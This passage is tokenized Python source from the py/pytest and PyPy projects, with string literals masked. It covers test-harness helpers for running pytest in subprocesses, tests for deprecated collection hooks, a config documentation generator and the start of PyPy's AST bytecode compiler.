session = self . config . initsession ( ) <EOL> self . config . pluginmanager . import_plugin ( "<STR_LIT>" ) <EOL> plugin = self . config . pluginmanager . getplugin ( "<STR_LIT>" ) <EOL> plugin . pytest_configure ( config = self . config ) <EOL> return self . config . getfsnode ( path ) <EOL> def prepare ( self ) : <EOL> p = self . tmpdir . join ( "<STR_LIT>" ) <EOL> if not p . check ( ) : <EOL> plugins = [ x for x in self . plugins if isinstance ( x , str ) ] <EOL> if not plugins : <EOL> return <EOL> p . write ( "<STR_LIT>" % plugins ) <EOL> else : <EOL> if self . plugins : <EOL> print "<STR_LIT>" , p <EOL> def popen ( self , cmdargs , stdout , stderr , ** kw ) : <EOL> if not hasattr ( py . std , '<STR_LIT>' ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> env = os . environ . copy ( ) <EOL> env [ '<STR_LIT>' ] = "<STR_LIT::>" . join ( filter ( None , [ <EOL> str ( os . getcwd ( ) ) , env . get ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) <EOL> kw [ '<STR_LIT>' ] = env <EOL> return py . std . subprocess . Popen ( cmdargs , stdout = stdout , stderr = stderr , ** kw ) <EOL> def run ( self , * cmdargs ) : <EOL> self . prepare ( ) <EOL> old = self . tmpdir . chdir ( ) <EOL> try : <EOL> return self . _run ( * cmdargs ) <EOL> finally : <EOL> old . chdir ( ) <EOL> def _run ( self , * cmdargs ) : <EOL> cmdargs = map ( str , cmdargs ) <EOL> p1 = py . path . local ( "<STR_LIT>" ) <EOL> p2 = py . path . local ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" , cmdargs , "<STR_LIT>" , py . path . local ( ) <EOL> f1 = p1 . open ( "<STR_LIT:w>" ) <EOL> f2 = p2 . open ( "<STR_LIT:w>" ) <EOL> popen = self . popen ( cmdargs , stdout = f1 , stderr = f2 , <EOL> close_fds = ( sys . platform != "<STR_LIT:win32>" ) ) <EOL> ret = popen . wait ( ) <EOL> f1 . close ( ) <EOL> f2 . close ( ) <EOL> out , err = p1 . readlines ( cr = <NUM_LIT:0> ) , p2 . readlines ( cr = <NUM_LIT:0> ) <EOL> if err : <EOL> for line in err : <EOL> print >> py . std . sys . 
stderr , line <EOL> if out : <EOL> for line in out : <EOL> print >> py . std . sys . stdout , line <EOL> return RunResult ( ret , out , err ) <EOL> def runpybin ( self , scriptname , * args ) : <EOL> fullargs = self . _getpybinargs ( scriptname ) + args <EOL> return self . run ( * fullargs ) <EOL> def _getpybinargs ( self , scriptname ) : <EOL> bindir = py . path . local ( py . __file__ ) . dirpath ( "<STR_LIT>" ) <EOL> script = bindir . join ( scriptname ) <EOL> assert script . check ( ) <EOL> return py . std . sys . executable , script <EOL> def runpython ( self , script ) : <EOL> return self . run ( py . std . sys . executable , script ) <EOL> def runpytest ( self , * args ) : <EOL> p = py . path . local . make_numbered_dir ( prefix = "<STR_LIT>" , <EOL> keep = None , rootdir = self . tmpdir ) <EOL> args = ( '<STR_LIT>' % p , ) + args <EOL> return self . runpybin ( "<STR_LIT>" , * args ) <EOL> def spawn_pytest ( self , string , expect_timeout = <NUM_LIT> ) : <EOL> pexpect = py . test . importorskip ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> basetemp = self . tmpdir . mkdir ( "<STR_LIT>" ) <EOL> invoke = "<STR_LIT>" % self . _getpybinargs ( "<STR_LIT>" ) <EOL> cmd = "<STR_LIT>" % ( invoke , basetemp , string ) <EOL> child = pexpect . spawn ( cmd , logfile = basetemp . join ( "<STR_LIT>" ) . open ( "<STR_LIT:w>" ) ) <EOL> child . timeout = expect_timeout <EOL> return child <EOL> class PseudoPlugin : <EOL> def __init__ ( self , vars ) : <EOL> self . __dict__ . update ( vars ) <EOL> class ReportRecorder ( object ) : <EOL> def __init__ ( self , comregistry ) : <EOL> self . comregistry = comregistry <EOL> comregistry . register ( self ) <EOL> def getcall ( self , name ) : <EOL> return self . hookrecorder . getcall ( name ) <EOL> def popcall ( self , name ) : <EOL> return self . hookrecorder . popcall ( name ) <EOL> def getcalls ( self , names ) : <EOL> """<STR_LIT>""" <EOL> return self . hookrecorder . 
getcalls ( names ) <EOL> def getreports ( self , names = "<STR_LIT>" ) : <EOL> return [ x . report for x in self . getcalls ( names ) ] <EOL> def matchreport ( self , inamepart = "<STR_LIT>" , names = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> l = [ ] <EOL> for rep in self . getreports ( names = names ) : <EOL> colitem = rep . getnode ( ) <EOL> if not inamepart or inamepart in colitem . listnames ( ) : <EOL> l . append ( rep ) <EOL> if not l : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( inamepart , ) ) <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" % ( <EOL> inamepart , l ) ) <EOL> return l [ <NUM_LIT:0> ] <EOL> def getfailures ( self , names = '<STR_LIT>' ) : <EOL> return [ rep for rep in self . getreports ( names ) if rep . failed ] <EOL> def getfailedcollections ( self ) : <EOL> return self . getfailures ( '<STR_LIT>' ) <EOL> def listoutcomes ( self ) : <EOL> passed = [ ] <EOL> skipped = [ ] <EOL> failed = [ ] <EOL> for rep in self . getreports ( "<STR_LIT>" ) : <EOL> if rep . passed : <EOL> if rep . when == "<STR_LIT>" : <EOL> passed . append ( rep ) <EOL> elif rep . skipped : <EOL> skipped . append ( rep ) <EOL> elif rep . failed : <EOL> failed . append ( rep ) <EOL> return passed , skipped , failed <EOL> def countoutcomes ( self ) : <EOL> return map ( len , self . listoutcomes ( ) ) <EOL> def assertoutcome ( self , passed = <NUM_LIT:0> , skipped = <NUM_LIT:0> , failed = <NUM_LIT:0> ) : <EOL> realpassed , realskipped , realfailed = self . listoutcomes ( ) <EOL> assert passed == len ( realpassed ) <EOL> assert skipped == len ( realskipped ) <EOL> assert failed == len ( realfailed ) <EOL> def clear ( self ) : <EOL> self . hookrecorder . calls [ : ] = [ ] <EOL> def unregister ( self ) : <EOL> self . comregistry . unregister ( self ) <EOL> self . hookrecorder . finish_recording ( ) <EOL> def test_reportrecorder ( testdir ) : <EOL> registry = py . _com . Registry ( ) <EOL> recorder = testdir . 
getreportrecorder ( registry ) <EOL> assert not recorder . getfailures ( ) <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> class rep : <EOL> excinfo = None <EOL> passed = False <EOL> failed = True <EOL> skipped = False <EOL> when = "<STR_LIT>" <EOL> recorder . hook . pytest_runtest_logreport ( report = rep ) <EOL> failures = recorder . getfailures ( ) <EOL> assert failures == [ rep ] <EOL> failures = recorder . getfailures ( ) <EOL> assert failures == [ rep ] <EOL> class rep : <EOL> excinfo = None <EOL> passed = False <EOL> failed = False <EOL> skipped = True <EOL> when = "<STR_LIT>" <EOL> rep . passed = False <EOL> rep . skipped = True <EOL> recorder . hook . pytest_runtest_logreport ( report = rep ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> rep = modcol . config . hook . pytest_make_collect_report ( collector = modcol ) <EOL> rep . passed = False <EOL> rep . failed = True <EOL> rep . skipped = False <EOL> recorder . hook . pytest_collectreport ( report = rep ) <EOL> passed , skipped , failed = recorder . listoutcomes ( ) <EOL> assert not passed and skipped and failed <EOL> numpassed , numskipped , numfailed = recorder . countoutcomes ( ) <EOL> assert numpassed == <NUM_LIT:0> <EOL> assert numskipped == <NUM_LIT:1> <EOL> assert numfailed == <NUM_LIT:1> <EOL> assert len ( recorder . getfailedcollections ( ) ) == <NUM_LIT:1> <EOL> recorder . unregister ( ) <EOL> recorder . clear ( ) <EOL> recorder . hook . pytest_runtest_logreport ( report = rep ) <EOL> py . test . raises ( ValueError , "<STR_LIT>" ) <EOL> class LineComp : <EOL> def __init__ ( self ) : <EOL> self . stringio = py . std . StringIO . StringIO ( ) <EOL> def assert_contains_lines ( self , lines2 ) : <EOL> """<STR_LIT>""" <EOL> __tracebackhide__ = True <EOL> val = self . stringio . getvalue ( ) <EOL> self . stringio . truncate ( <NUM_LIT:0> ) <EOL> lines1 = val . split ( "<STR_LIT:\n>" ) <EOL> return LineMatcher ( lines1 ) . 
fnmatch_lines ( lines2 ) <EOL> class LineMatcher : <EOL> def __init__ ( self , lines ) : <EOL> self . lines = lines <EOL> def str ( self ) : <EOL> return "<STR_LIT:\n>" . join ( self . lines ) <EOL> def fnmatch_lines ( self , lines2 ) : <EOL> if isinstance ( lines2 , str ) : <EOL> lines2 = py . code . Source ( lines2 ) <EOL> if isinstance ( lines2 , py . code . Source ) : <EOL> lines2 = lines2 . strip ( ) . lines <EOL> from fnmatch import fnmatch <EOL> __tracebackhide__ = True <EOL> lines1 = self . lines [ : ] <EOL> nextline = None <EOL> extralines = [ ] <EOL> for line in lines2 : <EOL> nomatchprinted = False <EOL> while lines1 : <EOL> nextline = lines1 . pop ( <NUM_LIT:0> ) <EOL> if line == nextline : <EOL> print "<STR_LIT>" , repr ( line ) <EOL> break <EOL> elif fnmatch ( nextline , line ) : <EOL> print "<STR_LIT>" , repr ( line ) <EOL> print "<STR_LIT>" , repr ( nextline ) <EOL> break <EOL> else : <EOL> if not nomatchprinted : <EOL> print "<STR_LIT>" , repr ( line ) <EOL> nomatchprinted = True <EOL> print "<STR_LIT>" , repr ( nextline ) <EOL> extralines . append ( nextline ) <EOL> else : <EOL> if line != nextline : <EOL> raise AssertionError ( "<STR_LIT>" % line ) <EOL> extralines . extend ( lines1 ) <EOL> return extralines <EOL> def test_parseconfig ( testdir ) : <EOL> config1 = testdir . parseconfig ( ) <EOL> config2 = testdir . parseconfig ( ) <EOL> assert config2 != config1 <EOL> assert config1 != py . test . config <EOL> def test_testdir_runs_with_plugin ( testdir ) : <EOL> testdir . makepyfile ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" <EOL> ] ) </s>
<s> import py <EOL> class TestCollectDeprecated : <EOL> def test_collect_with_deprecated_run_and_join ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> p = testdir . makepyfile ( somefile = """<STR_LIT>""" ) <EOL> config = testdir . parseconfig ( ) <EOL> dirnode = config . getfsnode ( p . dirpath ( ) ) <EOL> colitems = dirnode . collect ( ) <EOL> w = recwarn . pop ( DeprecationWarning ) <EOL> assert w . filename . find ( "<STR_LIT>" ) != - <NUM_LIT:1> <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> modcol = colitems [ <NUM_LIT:0> ] <EOL> assert modcol . name == "<STR_LIT>" <EOL> colitems = modcol . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:2> <EOL> assert colitems [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert colitems [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> clscol = colitems [ <NUM_LIT:1> ] <EOL> colitems = clscol . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> icol = colitems [ <NUM_LIT:0> ] <EOL> colitems = icol . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> assert colitems [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> def test_collect_with_deprecated_join_but_no_run ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> col = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> colitems = col . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> funcitem = colitems [ <NUM_LIT:0> ] <EOL> assert funcitem . name == "<STR_LIT>" <EOL> def test_function_custom_run ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> funcitem = modcol . collect ( ) [ <NUM_LIT:0> ] <EOL> assert funcitem . name == '<STR_LIT>' <EOL> recwarn . clear ( ) <EOL> funcitem . 
_deprecated_testexecution ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> def test_function_custom_execute ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> funcitem = modcol . collect ( ) [ <NUM_LIT:0> ] <EOL> assert funcitem . name == '<STR_LIT>' <EOL> funcitem . _deprecated_testexecution ( ) <EOL> w = recwarn . pop ( DeprecationWarning ) <EOL> assert w . filename . find ( "<STR_LIT>" ) != - <NUM_LIT:1> <EOL> def test_function_deprecated_run_execute ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> funcitem = modcol . collect ( ) [ <NUM_LIT:0> ] <EOL> recwarn . clear ( ) <EOL> funcitem . _deprecated_testexecution ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> def test_function_deprecated_run_recursive ( self , testdir ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> colitems = py . test . deprecated_call ( modcol . collect ) <EOL> funcitem = colitems [ <NUM_LIT:0> ] <EOL> def test_conftest_subclasses_Module_with_non_pyfile ( self , testdir ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> testme = testdir . makefile ( '<STR_LIT>' , testme = "<STR_LIT:hello>" ) <EOL> config = testdir . parseconfig ( testme ) <EOL> col = config . getfsnode ( testme ) <EOL> assert col . collect ( ) == [ ] </s>
<s> import pypy . annotation . model </s>
<s> import py <EOL> from py . __ . rest . rst import Rest , Paragraph , Strong , ListItem , Title , Link <EOL> from py . __ . rest . rst import Directive , Em , Quote , Text <EOL> from pypy . config . config import ChoiceOption , BoolOption , StrOption , IntOption <EOL> from pypy . config . config import FloatOption , OptionDescription , Option , Config <EOL> from pypy . config . config import ArbitraryOption , DEFAULT_OPTION_NAME <EOL> from pypy . config . config import _getnegation <EOL> configdocdir = py . magic . autopath ( ) . dirpath ( ) . dirpath ( ) . join ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def get_fullpath ( opt , path ) : <EOL> if path : <EOL> return "<STR_LIT>" % ( path , opt . _name ) <EOL> else : <EOL> return opt . _name <EOL> def get_cmdline ( cmdline , fullpath ) : <EOL> if cmdline is DEFAULT_OPTION_NAME : <EOL> return '<STR_LIT>' % ( fullpath . replace ( '<STR_LIT:.>' , '<STR_LIT:->' ) , ) <EOL> else : <EOL> return cmdline <EOL> class __extend__ ( Option ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> fullpath = get_fullpath ( self , path ) <EOL> result = Rest ( <EOL> Title ( fullpath , abovechar = "<STR_LIT:=>" , belowchar = "<STR_LIT:=>" ) , <EOL> Directive ( "<STR_LIT>" ) , <EOL> Paragraph ( Link ( "<STR_LIT>" , path + "<STR_LIT>" ) ) , <EOL> Title ( "<STR_LIT>" ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . _name ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . doc ) ) <EOL> if self . cmdline is not None : <EOL> cmdline = get_cmdline ( self . cmdline , fullpath ) <EOL> result . add ( ListItem ( Strong ( "<STR_LIT>" ) , cmdline ) ) <EOL> return result <EOL> class __extend__ ( ChoiceOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( ChoiceOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> * [ ListItem ( str ( val ) ) for val in self . 
values ] ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> requirements = [ ] <EOL> for val in self . values : <EOL> if val not in self . _requires : <EOL> continue <EOL> req = self . _requires [ val ] <EOL> requirements . append ( ListItem ( "<STR_LIT>" % ( val , ) , <EOL> * [ ListItem ( Link ( opt , opt + "<STR_LIT>" ) , <EOL> "<STR_LIT>" % ( rval , ) ) <EOL> for ( opt , rval ) in req ] ) ) <EOL> if requirements : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , * requirements ) ) <EOL> return content <EOL> class __extend__ ( BoolOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( BoolOption , self ) . make_rest_doc ( path ) <EOL> fullpath = get_fullpath ( self , path ) <EOL> if self . negation and self . cmdline is not None : <EOL> if self . cmdline is DEFAULT_OPTION_NAME : <EOL> cmdline = '<STR_LIT>' % ( fullpath . replace ( '<STR_LIT:.>' , '<STR_LIT:->' ) , ) <EOL> else : <EOL> cmdline = self . cmdline <EOL> neg_cmdline = [ "<STR_LIT>" + _getnegation ( argname . lstrip ( "<STR_LIT:->" ) ) <EOL> for argname in cmdline . split ( ) <EOL> if argname . startswith ( "<STR_LIT>" ) ] [ <NUM_LIT:0> ] <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> neg_cmdline ) ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> if self . _requires is not None : <EOL> requirements = [ ListItem ( Link ( opt , opt + "<STR_LIT>" ) , <EOL> "<STR_LIT>" % ( rval , ) ) <EOL> for ( opt , rval ) in self . _requires ] <EOL> if requirements : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , * requirements ) ) <EOL> if self . _suggests is not None : <EOL> suggestions = [ ListItem ( Link ( opt , opt + "<STR_LIT>" ) , <EOL> "<STR_LIT>" % ( rval , ) ) <EOL> for ( opt , rval ) in self . 
_suggests ] <EOL> if suggestions : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , * suggestions ) ) <EOL> return content <EOL> class __extend__ ( IntOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( IntOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> return content <EOL> class __extend__ ( FloatOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( FloatOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> return content <EOL> class __extend__ ( StrOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( StrOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> return content <EOL> class __extend__ ( ArbitraryOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( ArbitraryOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> elif self . defaultfactory is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> str ( self . 
defaultfactory ) ) ) <EOL> return content <EOL> class __extend__ ( OptionDescription ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> fullpath = get_fullpath ( self , path ) <EOL> content = Rest ( <EOL> Title ( fullpath , abovechar = "<STR_LIT:=>" , belowchar = "<STR_LIT:=>" ) , <EOL> Directive ( "<STR_LIT>" ) ) <EOL> if path : <EOL> content . add ( <EOL> Paragraph ( Link ( "<STR_LIT>" , path + "<STR_LIT>" ) ) ) <EOL> content . join ( <EOL> Title ( "<STR_LIT>" ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . _name ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . doc ) , <EOL> Title ( "<STR_LIT>" ) ) <EOL> stack = [ ] <EOL> prefix = fullpath <EOL> curr = content <EOL> config = Config ( self ) <EOL> for ending in self . getpaths ( include_groups = True ) : <EOL> subpath = fullpath + "<STR_LIT:.>" + ending <EOL> while not ( subpath . startswith ( prefix ) and <EOL> subpath [ len ( prefix ) ] == "<STR_LIT:.>" ) : <EOL> curr , prefix = stack . pop ( ) <EOL> print subpath , fullpath , ending , curr <EOL> sub , step = config . _cfgimpl_get_home_by_path ( ending ) <EOL> doc = getattr ( sub . _cfgimpl_descr , step ) . doc <EOL> if doc : <EOL> new = curr . add ( ListItem ( Link ( subpath + "<STR_LIT::>" , subpath + "<STR_LIT>" ) , <EOL> Em ( doc ) ) ) <EOL> else : <EOL> new = curr . add ( ListItem ( Link ( subpath + "<STR_LIT::>" , subpath + "<STR_LIT>" ) ) ) <EOL> stack . append ( ( curr , prefix ) ) <EOL> prefix = subpath <EOL> curr = new <EOL> return content <EOL> def _get_section_header ( cmdline , fullpath , subdescr ) : <EOL> txtfile = configdocdir . join ( fullpath + "<STR_LIT>" ) <EOL> print txtfile , <EOL> if not txtfile . check ( ) : <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> content = txtfile . read ( ) <EOL> if "<STR_LIT>" in content : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def make_cmdline_overview ( descr , title = True ) : <EOL> content = Rest ( ) <EOL> if title : <EOL> content . 
add ( <EOL> Title ( "<STR_LIT>" % ( descr . _name , ) , <EOL> abovechar = "<STR_LIT:=>" , belowchar = "<STR_LIT:=>" ) ) <EOL> cmdlines = [ ] <EOL> config = Config ( descr ) <EOL> for path in config . getpaths ( include_groups = False ) : <EOL> subconf , step = config . _cfgimpl_get_home_by_path ( path ) <EOL> fullpath = ( descr . _name + "<STR_LIT:.>" + path ) <EOL> prefix = fullpath . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> subdescr = getattr ( subconf . _cfgimpl_descr , step ) <EOL> cmdline = get_cmdline ( subdescr . cmdline , fullpath ) <EOL> if cmdline is not None : <EOL> header = _get_section_header ( cmdline , fullpath , subdescr ) <EOL> cmdlines . append ( ( header , cmdline , fullpath , subdescr ) ) <EOL> cmdlines . sort ( key = lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] . strip ( "<STR_LIT:->" ) ) ) <EOL> currheader = "<STR_LIT>" <EOL> curr = content <EOL> for header , cmdline , fullpath , subdescr in cmdlines : <EOL> if header != currheader : <EOL> content . add ( Title ( header , abovechar = "<STR_LIT>" , belowchar = "<STR_LIT:=>" ) ) <EOL> curr = content . add ( Paragraph ( ) ) <EOL> currheader = header <EOL> curr . add ( ListItem ( Link ( cmdline + "<STR_LIT::>" , fullpath + "<STR_LIT>" ) , <EOL> Text ( subdescr . doc ) ) ) <EOL> return content <EOL> def register_config_role ( docdir ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from docutils . parsers . rst import directives , states , roles <EOL> from py . __ . rest . directive import register_linkrole <EOL> except ImportError : <EOL> return <EOL> def config_role ( name , rawtext , text , lineno , inliner , options = { } , <EOL> content = [ ] ) : <EOL> from docutils import nodes <EOL> from pypy . config . pypyoption import get_pypy_config <EOL> from pypy . config . makerestdoc import get_cmdline <EOL> txt = docdir . join ( "<STR_LIT>" , text + "<STR_LIT>" ) <EOL> html = docdir . join ( "<STR_LIT>" , text + "<STR_LIT>" ) <EOL> assert txt . 
check ( ) <EOL> assert name == "<STR_LIT>" <EOL> sourcedir = py . path . local ( inliner . document . settings . _source ) . dirpath ( ) <EOL> curr = sourcedir <EOL> prefix = "<STR_LIT>" <EOL> while <NUM_LIT:1> : <EOL> relative = str ( html . relto ( curr ) ) <EOL> if relative : <EOL> break <EOL> curr = curr . dirpath ( ) <EOL> prefix += "<STR_LIT>" <EOL> config = get_pypy_config ( ) <EOL> h , n = config . _cfgimpl_get_home_by_path ( text ) <EOL> opt = getattr ( h . _cfgimpl_descr , n ) <EOL> cmdline = get_cmdline ( opt . cmdline , text ) <EOL> if cmdline is not None : <EOL> shortest_long_option = '<STR_LIT:X>' * <NUM_LIT:1000> <EOL> for cmd in cmdline . split ( ) : <EOL> if cmd . startswith ( '<STR_LIT>' ) and len ( cmd ) < len ( shortest_long_option ) : <EOL> shortest_long_option = cmd <EOL> text = shortest_long_option <EOL> target = prefix + relative <EOL> print text , target <EOL> reference_node = nodes . reference ( rawtext , text , name = text , refuri = target ) <EOL> return [ reference_node ] , [ ] <EOL> config_role . content = True <EOL> config_role . options = { } <EOL> roles . register_canonical_role ( "<STR_LIT>" , config_role ) </s>
<s> """<STR_LIT>""" <EOL> from pypy . interpreter . astcompiler import ast , assemble , symtable , consts , misc <EOL> from pypy . interpreter . astcompiler import optimize <EOL> from pypy . interpreter . pyparser . error import SyntaxError <EOL> from pypy . tool import stdlib_opcode as ops <EOL> from pypy . interpreter . pyparser import future <EOL> from pypy . interpreter . error import OperationError <EOL> from pypy . module . __builtin__ . __init__ import BUILTIN_TO_INDEX <EOL> def compile_ast ( space , module , info ) : <EOL> """<STR_LIT>""" <EOL> symbols = symtable . SymtableBuilder ( space , module , info ) <EOL> return TopLevelCodeGenerator ( space , module , symbols , info ) . assemble ( ) <EOL> name_ops_default = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_NAME , <EOL> ast . Store : ops . STORE_NAME , <EOL> ast . Del : ops . DELETE_NAME <EOL> } ) <EOL> name_ops_fast = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_FAST , <EOL> ast . Store : ops . STORE_FAST , <EOL> ast . Del : ops . DELETE_FAST <EOL> } ) <EOL> name_ops_deref = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_DEREF , <EOL> ast . Store : ops . STORE_DEREF , <EOL> } ) <EOL> name_ops_global = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_GLOBAL , <EOL> ast . Store : ops . STORE_GLOBAL , <EOL> ast . Del : ops . DELETE_GLOBAL <EOL> } ) <EOL> unary_operations = misc . dict_to_switch ( { <EOL> ast . Invert : ops . UNARY_INVERT , <EOL> ast . Not : ops . UNARY_NOT , <EOL> ast . UAdd : ops . UNARY_POSITIVE , <EOL> ast . USub : ops . UNARY_NEGATIVE <EOL> } ) <EOL> binary_operations = misc . dict_to_switch ( { <EOL> ast . Add : ops . BINARY_ADD , <EOL> ast . Sub : ops . BINARY_SUBTRACT , <EOL> ast . Mult : ops . BINARY_MULTIPLY , <EOL> ast . Mod : ops . BINARY_MODULO , <EOL> ast . Pow : ops . BINARY_POWER , <EOL> ast . LShift : ops . BINARY_LSHIFT , <EOL> ast . RShift : ops . BINARY_RSHIFT , <EOL> ast . BitOr : ops . BINARY_OR , <EOL> ast . BitAnd : ops . 
BINARY_AND , <EOL> ast . BitXor : ops . BINARY_XOR , <EOL> ast . FloorDiv : ops . BINARY_FLOOR_DIVIDE <EOL> } ) <EOL> inplace_operations = misc . dict_to_switch ( { <EOL> ast . Add : ops . INPLACE_ADD , <EOL> ast . Sub : ops . INPLACE_SUBTRACT , <EOL> ast . Mult : ops . INPLACE_MULTIPLY , <EOL> ast . Mod : ops . INPLACE_MODULO , <EOL> ast . Pow : ops . INPLACE_POWER , <EOL> ast . LShift : ops . INPLACE_LSHIFT , <EOL> ast . RShift : ops . INPLACE_RSHIFT , <EOL> ast . BitOr : ops . INPLACE_OR , <EOL> ast . BitAnd : ops . INPLACE_AND , <EOL> ast . BitXor : ops . INPLACE_XOR , <EOL> ast . FloorDiv : ops . INPLACE_FLOOR_DIVIDE <EOL> } ) <EOL> compare_operations = misc . dict_to_switch ( { <EOL> ast . Eq : <NUM_LIT:2> , <EOL> ast . NotEq : <NUM_LIT:3> , <EOL> ast . Lt : <NUM_LIT:0> , <EOL> ast . LtE : <NUM_LIT:1> , <EOL> ast . Gt : <NUM_LIT:4> , <EOL> ast . GtE : <NUM_LIT:5> , <EOL> ast . In : <NUM_LIT:6> , <EOL> ast . NotIn : <NUM_LIT:7> , <EOL> ast . Is : <NUM_LIT:8> , <EOL> ast . IsNot : <NUM_LIT:9> <EOL> } ) <EOL> subscr_operations = misc . dict_to_switch ( { <EOL> ast . AugLoad : ops . BINARY_SUBSCR , <EOL> ast . Load : ops . BINARY_SUBSCR , <EOL> ast . AugStore : ops . STORE_SUBSCR , <EOL> ast . Store : ops . STORE_SUBSCR , <EOL> ast . Del : ops . DELETE_SUBSCR <EOL> } ) <EOL> slice_operations = misc . dict_to_switch ( { <EOL> ast . AugLoad : ops . SLICE , <EOL> ast . Load : ops . SLICE , <EOL> ast . AugStore : ops . STORE_SLICE , <EOL> ast . Store : ops . STORE_SLICE , <EOL> ast . Del : ops . DELETE_SLICE <EOL> } ) <EOL> F_BLOCK_LOOP = <NUM_LIT:0> <EOL> F_BLOCK_EXCEPT = <NUM_LIT:1> <EOL> F_BLOCK_FINALLY = <NUM_LIT:2> <EOL> F_BLOCK_FINALLY_END = <NUM_LIT:3> <EOL> class PythonCodeGenerator ( assemble . PythonCodeMaker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , 